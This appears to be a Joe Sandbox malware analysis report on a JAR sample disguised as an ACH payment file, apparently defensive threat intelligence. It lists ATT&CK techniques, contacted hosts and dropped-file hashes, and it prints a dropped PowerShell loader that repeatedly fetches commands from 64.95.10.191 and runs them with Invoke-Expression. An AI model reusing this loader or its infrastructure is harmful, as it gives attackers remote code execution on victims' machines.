Services File Permissions Weakness		Cached Domain Credentials1
Remote System Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync1
System Network Configuration Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
File Deletion		Proc Filesystem2
File and Directory Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow22
System Information Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430484 Sample: 23-April-24-ACH-7fa67756.jar Startdate: 23/04/2024 Architecture: WINDOWS Score: 52 54 cryptonews.direct 2->54 62 Exploit detected, runtime environment starts unknown processes 2->62 9 msiexec.exe 80 35 2->9         started        12 cmd.exe 2 2->12         started        signatures3 process4 file5 52 C:\ProgramData\lgp\sjm, ASCII 9->52 dropped 14 cmd.exe 1 9->14         started        17 java.exe 10 12->17         started        19 conhost.exe 12->19         started        process6 signatures7 66 Suspicious powershell command line found 14->66 21 powershell.exe 22 22 14->21         started        25 conhost.exe 14->25         started        27 cmd.exe 1 17->27         started        29 cmd.exe 4 2 17->29         started        31 icacls.exe 1 17->31         started        process8 dnsIp9 56 64.95.10.191, 49712, 49713, 49714 BRAHMAN-NYUS United States 21->56 64 Uses ping.exe to check the status of other devices and networks 21->64 33 conhost.exe 21->33         started        35 conhost.exe 21->35         started        37 dllhost.exe 21->37         started        50 22 other processes 21->50 39 curl.exe 2 27->39         started        42 conhost.exe 27->42         started        44 msiexec.exe 3 29->44         started        46 conhost.exe 29->46         started        48 conhost.exe 31->48         started        signatures10 process11 dnsIp12 58 cryptonews.direct 172.67.168.231, 443, 49708 CLOUDFLARENETUS United States 39->58 60 127.0.0.1 unknown unknown 39->60

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
23-April-24-ACH-7fa67756.jar0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://bugreport.sun.com/bugreport/0%URL Reputationsafe
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC0%Avira URL Cloudsafe
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiS0%Avira URL Cloudsafe
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msicurl.exe0%Avira URL Cloudsafe
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi0%Avira URL Cloudsafe
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC:0%Avira URL Cloudsafe
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiXq0%Avira URL Cloudsafe
http://64.95.10.191/0%Avira URL Cloudsafe
http://bugreport.sun.com/bugreport/k0%Avira URL Cloudsafe
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiWinSta00%Avira URL Cloudsafe
http://64.95.10.191/22200450580%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cryptonews.direct
172.67.168.231
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msifalse
    • Avira URL Cloud: safe
    		unknown
    http://64.95.10.191/2220045058false
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://64.95.10.191/sjm.19.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiCjava.exe, 00000002.00000002.1436738305.000000000460B000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiSjava.exe, 00000002.00000002.1436738305.000000000460B000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://java.oracle.com/java.exe, 00000002.00000002.1439346877.0000000009750000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC:java.exe, 00000002.00000002.1440388947.0000000014D13000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1323029932.0000000014D13000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msicurl.execurl.exe, 0000000B.00000002.1286661864.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000002.1286780766.0000000002C70000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiXqjava.exe, 00000002.00000002.1440388947.0000000014D13000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1323029932.0000000014D13000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://bugreport.sun.com/bugreport/kjava.exe, 00000002.00000002.1436738305.000000000472C000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiWinSta0curl.exe, 0000000B.00000002.1286661864.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000002.1286780766.0000000002C70000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://bugreport.sun.com/bugreport/java.exe, 00000002.00000002.1439346877.00000000097F7000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      172.67.168.231
      		cryptonews.directUnited States
      		13335CLOUDFLARENETUSfalse
      64.95.10.191
      		unknownUnited States
      		31982BRAHMAN-NYUSfalse

      Private

      IP
      127.0.0.1

      General Information

      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1430484
      Start date and time:2024-04-23 17:45:08 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 8m 19s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsfilecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:52
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • GSI enabled (Java)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:23-April-24-ACH-7fa67756.jar
      Detection:MAL
      Classification:mal52.troj.expl.winJAR@115/28@1/3
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 88%
      • Number of executed functions: 9
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Found application associated with file extension: .jar
      • Override analysis time to 240s for powershell

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 23.45.182.73, 23.45.182.103, 23.45.182.100, 23.45.182.112
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
      • Execution Graph export aborted for target java.exe, PID 6152 because it is empty
      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.
      • VT rate limit hit for: 23-April-24-ACH-7fa67756.jar

      Simulations

      Behavior and APIs

      TimeTypeDescription
      17:46:13API Interceptor12501075x Sleep call for process: powershell.exe modified
      17:46:14API Interceptor1x Sleep call for process: dllhost.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUS_file____C__Users_hp_Downloads_C__Users_moodyt_AppData_Local_Temp_2_RemittanceAdvice17-Apr-2024.htmlGet hashmaliciousUnknownBrowse
      • 104.26.8.50
      Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
      • 104.17.208.58
      http://geoguesser.com/seterra/en-an/vpg/3811?C=K44CTGet hashmaliciousUnknownBrowse
      • 172.67.188.149
      TeaiGames.exeGet hashmaliciousNovaSentinelBrowse
      • 172.67.196.42
      https://bitly.ws/3icqP?bUL=OnEzsOzmqRGet hashmaliciousUnknownBrowse
      • 172.67.183.48
      http://geoguesser.com/seterra/en-an/vpg/3800Get hashmaliciousUnknownBrowse
      • 172.67.188.149
      https://docs-paymentreceipts.infoGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
      • 104.17.2.184
      https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3ZGet hashmaliciousUnknownBrowse
      • 1.1.1.1
      CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
      • 172.67.74.152
      https://main-bvxea6i-qhygy63sspp2a.ca-1.platformsh.site/sample-page/Get hashmaliciousHTMLPhisherBrowse
      • 172.67.142.234
      BRAHMAN-NYUSz5BtaqcOWn.exeGet hashmaliciousUnknownBrowse
      • 64.95.10.243
      https://assets-usa.mkt.dynamics.com/80915e83-72d1-ee11-9048-002248282c18/digitalassets/standaloneforms/5cda353e-6bd2-ee11-9079-000d3a99146aGet hashmaliciousUnknownBrowse
      • 64.95.10.68
      https://assets-usa.mkt.dynamics.com/80915e83-72d1-ee11-9048-002248282c18/digitalassets/standaloneforms/5cda353e-6bd2-ee11-9079-000d3a99146aGet hashmaliciousUnknownBrowse
      • 64.95.10.68

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      74954a0c86284d0d6e1c4efefe92b521New Soft Update.exeGet hashmaliciousUnknownBrowse
      • 172.67.168.231
      u2.batGet hashmaliciousBazar Loader, QbotBrowse
      • 172.67.168.231
      SecuriteInfo.com.Python.Stealer.1447.10844.3562.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
      • 172.67.168.231
      4PPlLk8IT5.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
      • 172.67.168.231
      SecuriteInfo.com.Trojan.GenericKD.72333858.1744.9991.exeGet hashmaliciousUnknownBrowse
      • 172.67.168.231
      pRcbxPdooL.exeGet hashmaliciousUnknownBrowse
      • 172.67.168.231
      Payslip-9583.exeGet hashmaliciousUnknownBrowse
      • 172.67.168.231
      https://d226ryxb715ss0.cloudfront.net/OPNC-v1.1.25.0.msiGet hashmaliciousUnknownBrowse
      • 172.67.168.231
      RKeUGmUe.posh.ps1Get hashmaliciousUnknownBrowse
      • 172.67.168.231
      MkVtrMLG.posh.ps1Get hashmaliciousUnknownBrowse
      • 172.67.168.231

      Dropped Files

      No context

      Created / dropped Files

      C:\Config.Msi\46f336.rbs

      Download File
      Process:C:\Windows\System32\msiexec.exe
      File Type:data
      Category:modified
      Size (bytes):9533
      Entropy (8bit):5.587762066473659
      Encrypted:false
      SSDEEP:96:wn2apnXdwGeCBN8LU59CCsThqBLU59CC6jeEOeIkThqhHRjpFMUw8NkclChC6pgK:w2apnRewl59BIR59BxEbTU0U6pHEQ
      MD5:C81F177E7856B892EB6FCF4BAB7419D3
      SHA1:9B3DC77DBE50E4446CA021195F36BD4AC4C3627A
      SHA-256:FC4DE9ABF182A4FF3E83AFCCD1241228667A6C5702C58A023B0CC20667A4AFB8
      SHA-512:34BC466EE2E88D12A0963DB0964969D9F0AB1D16DB49F2FE12911600FE4B818E51213AF2D98BB62C83CF8129978BCD3201A94EDC33C4AFB32384CD55484BEF4F
      Malicious:false
      Preview:...@IXOS.@.....@..X.@.....@.....@.....@.....@.....@......&.{5388A5D6-8B37-4242-B64C-4D72F236B407}..MSD Setup..aHPCrYM1.msi.@.....@.....@.....@........&.{D59C64C0-985A-437E-9F88-C578DBDDC731}.....@.....@.....@.....@.......@.....@.....@.......@......MSD Setup......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{5388A5D6-8B37-4242-B64C-4D728033EE88}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@......&.{5388A5D6-8B37-4242-B64C-4D72F511202A}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@......&.{5388A5D6-8B37-4242-B64C-4D7245AF011A}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@......&.{5388A5D6-8B37-4242-B64C-4D7288057524}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@......&.{5388A5D6-8B37-4242-B64C-4D7235B6147A}&.{5388A5D6-8B37-4242-B64C-4D72F236B407}.@........CreateFolders..Creating folders..Folder: [1]"...C:\ProgramData\.@.............. .......,.............................x..................................

      C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp

      Download File
      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):52
      Entropy (8bit):4.834679141051596
      Encrypted:false
      SSDEEP:3:oFj4I5vpm4USH/yn:oJ5bH6
      MD5:9B2B9B08A9B8593CAA3EAA48A844C69D
      SHA1:9F1F5AF67115FF63D6B9D2D161A5BEEB2054FB68
      SHA-256:1816C34F50C8F4790164A2FFE9110810119FD0406B261CD2905D1F216F2D7754
      SHA-512:C4E13F14BA232467D941CDE710B181147A008089911E8F8D9DCD621216766F3B4AE152EF33BA45AD5429DBE0A48AE6A90A608C01EB646F8497085B76CA2C736A
      Malicious:false
      Preview:C:\Program Files (x86)\Java\jre-1.8..1713887154393..

      C:\ProgramData\lgp\sjm

      Download File
      Process:C:\Windows\System32\msiexec.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):477
      Entropy (8bit):5.046983694783584
      Encrypted:false
      SSDEEP:6:0xAu7yLH3zQEM302ANAqwssVeK4yZfUUuYaH9sXUrsVeUrK5Yl4DFJav/FMgi0Tn:0GugH3UEM36ARf9i1QXVed5BFPV0wA
      MD5:ABC748D5FB1B867BB5F2645778D813B0
      SHA1:CB7B4A28D8A9F29C2552EE439E4FAE66D2C44D17
      SHA-256:5F5921A54F42F72CBC94976097D3FA905B3A28702F7DC47DAA64CA38091005A4
      SHA-512:16E84A95E6E35732227B03B3BEDB61C664FFE9F5B3B668BAD36BA1A04430D4AE67F20002FD4EFF1F4D7597246F9B6BFD8D73D7CC9962100F4365E326AAD04250
      Malicious:true
      Preview:.$fso = New-Object -Com "Scripting.FileSystemObject".$SerialNumber = $fso.GetDrive("c:\").SerialNumber.$SerialNumber = "{0:X}" -f $SerialNumber.$SerialNumber = [convert]::toint64($SerialNumber,16)..$serial = $SerialNumber.$ip = 'http://64.95.10.191/'.$url = $ip+$serial..$s = New-Object System.Net.WebClient.while ($true) {. ping 1.1.1.1..ping 1.1.1.1. try {. $result=$s.DownloadString($url). }. catch {. continue. }. Invoke-Expression $result.}

      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Download File
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:modified
      Size (bytes):11608
      Entropy (8bit):4.887486353364779
      Encrypted:false
      SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdzVFn3eGOVpN6K3bkkjo5LgkjDt4iWN3yBGHB9sT:lVib49PVoGIpN6KQkj2kkjh4iUx4cYK6
      MD5:E3CC2E628C73E9D29D58817DFC1ADCC5
      SHA1:3720336F2BCB67ADACD9FED9645AC3FFDC67928D
      SHA-256:6C52B5B7085CA1A5EB18B7C7FF740BEC18D0911CCF7B321B4668EF725A912F3B
      SHA-512:6C5DC96D036DD24BE29720F1568EE70DB069EE5F3F91D59289A9E597C699D4BEBEBA5525B43B3BC7EAE3D467211C6826137FEF1A57E42593DB6E308A2237EE32
      Malicious:false
      Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2sljm0c.nhc.psm1

      Download File
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp3c1nj5.x2f.ps1

      Download File
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode

      C:\Users\user\AppData\Local\Temp\hsperfdata_user\6152

      Download File
      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.2982523161208361
      Encrypted:false
      SSDEEP:96:fyUr2ff8GmV32hVL/6Pt+BzDnUI1kASJYZQHrP1eVox3o:fyBX8G432hVL/6WUI1eJ2QHrPAVk
      MD5:043F2534C3ACABF3E26CDEA20D31791D
      SHA1:1C5A2C0E959C89BD70196E495596E42A406CBD14
      SHA-256:163AE98F1BB3D1D755E5A40B6BA7B16909F816CB72595675060731133D36E6C0
      SHA-512:F40143968B8D3DA5D27F4B02381479746FAA84D968C6A4260240DC80FF0E0A7CD57813328C184CC28A57DF5C0353F819446305194E02C3EB572BBD5780F9AC11
      Malicious:false
      Preview:.........9......).u..... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)

      Download File
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):6220
      Entropy (8bit):3.7248141497774925
      Encrypted:false
      SSDEEP:96:SBFQC7QDgkvhkvCCtkWnfWOoHOJQWnfWO3HOJU:SBFTAskWf7JQWfMJU
      MD5:778840C49F5A6776EE850147B66D0DAC
      SHA1:C20A9DB4652F9E510C8983FF3D96BAA93DBED7AA
      SHA-256:5C4AFCFFA4D9C0D4A24370B4127E6A50D33CA1C35C53E37887AC892508881AF5
      SHA-512:A931913E88374B6909C800B8DFE744B495A468F7DD09FD4F74E975B7ED62FB678ECE981740674688C9FB2B841D749B64378AD9550D2037B1B0B688CB36FCA9F6
      Malicious:false
      Preview:...................................FL..................F.".. ....'GDj...J..]....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....}gO.....$.]........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.X.}..........................=...A.p.p.D.a.t.a...B.V.1......X.}..Roaming.@......EWsG.X.}..........................q>?.R.o.a.m.i.n.g.....\.1......X.}..MICROS~1..D......EWsG.X.}...........................t@.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.X.}..........................%...W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.X.}....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.X.}....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.X.}................

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\YBK27W652F4IJAVOUCH5.temp

      Download File
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):6220
      Entropy (8bit):3.7248141497774925
      Encrypted:false
      SSDEEP:96:SBFQC7QDgkvhkvCCtkWnfWOoHOJQWnfWO3HOJU:SBFTAskWf7JQWfMJU
      MD5:778840C49F5A6776EE850147B66D0DAC
      SHA1:C20A9DB4652F9E510C8983FF3D96BAA93DBED7AA
      SHA-256:5C4AFCFFA4D9C0D4A24370B4127E6A50D33CA1C35C53E37887AC892508881AF5
      SHA-512:A931913E88374B6909C800B8DFE744B495A468F7DD09FD4F74E975B7ED62FB678ECE981740674688C9FB2B841D749B64378AD9550D2037B1B0B688CB36FCA9F6
      Malicious:false
      Preview:...................................FL..................F.".. ....'GDj...J..]....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....}gO.....$.]........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.X.}..........................=...A.p.p.D.a.t.a...B.V.1......X.}..Roaming.@......EWsG.X.}..........................q>?.R.o.a.m.i.n.g.....\.1......X.}..MICROS~1..D......EWsG.X.}...........................t@.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.X.}..........................%...W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.X.}....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.X.}....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.X.}................

      C:\Windows\Installer\46f335.msi

      Download File
      Process:C:\Windows\System32\msiexec.exe
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments: This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number: {D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
      Category:dropped
      Size (bytes):32768
      Entropy (8bit):3.790831399963701
      Encrypted:false
      SSDEEP:384:nzxSDkMI5kI0ey3M5sCJx5Pey3M5sC0qoXoCHo:/MS4eWMmCxeWMmC
      MD5:00A9FA63E6253CB5F8F8448281DDD054
      SHA1:083C7BF52727EDFFA8160308C677B4DA8A4F7815
      SHA-256:C76014007BA73EFC85FD7B1D9E9BCED4EA66DA7C4CF4DD1560EC0CF02361FC5B
      SHA-512:BED03ACA4562187AB1AA818AA8C53474982C84F5F6E5B0331A2AF4FEB51D5BC7B1AC1D495040DCD2B572827D019FA3FF04D808011FEBC9FC52113B93587CB7A5
      Malicious:false
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Windows\Installer\46f337.msi

      Download File
      Process:C:\Windows\System32\msiexec.exe
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments: This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number: {D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
      Category:dropped
      Size (bytes):32768
      Entropy (8bit):3.790831399963701
      Encrypted:false
      SSDEEP:384:nzxSDkMI5kI0ey3M5sCJx5Pey3M5sC0qoXoCHo:/MS4eWMmCxeWMmC
      MD5:00A9FA63E6253CB5F8F8448281DDD054
      SHA1:083C7BF52727EDFFA8160308C677B4DA8A4F7815
      SHA-256:C76014007BA73EFC85FD7B1D9E9BCED4EA66DA7C4CF4DD1560EC0CF02361FC5B
      SHA-512:BED03ACA4562187AB1AA818AA8C53474982C84F5F6E5B0331A2AF4FEB51D5BC7B1AC1D495040DCD2B572827D019FA3FF04D808011FEBC9FC52113B93587CB7A5
      Malicious:false
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

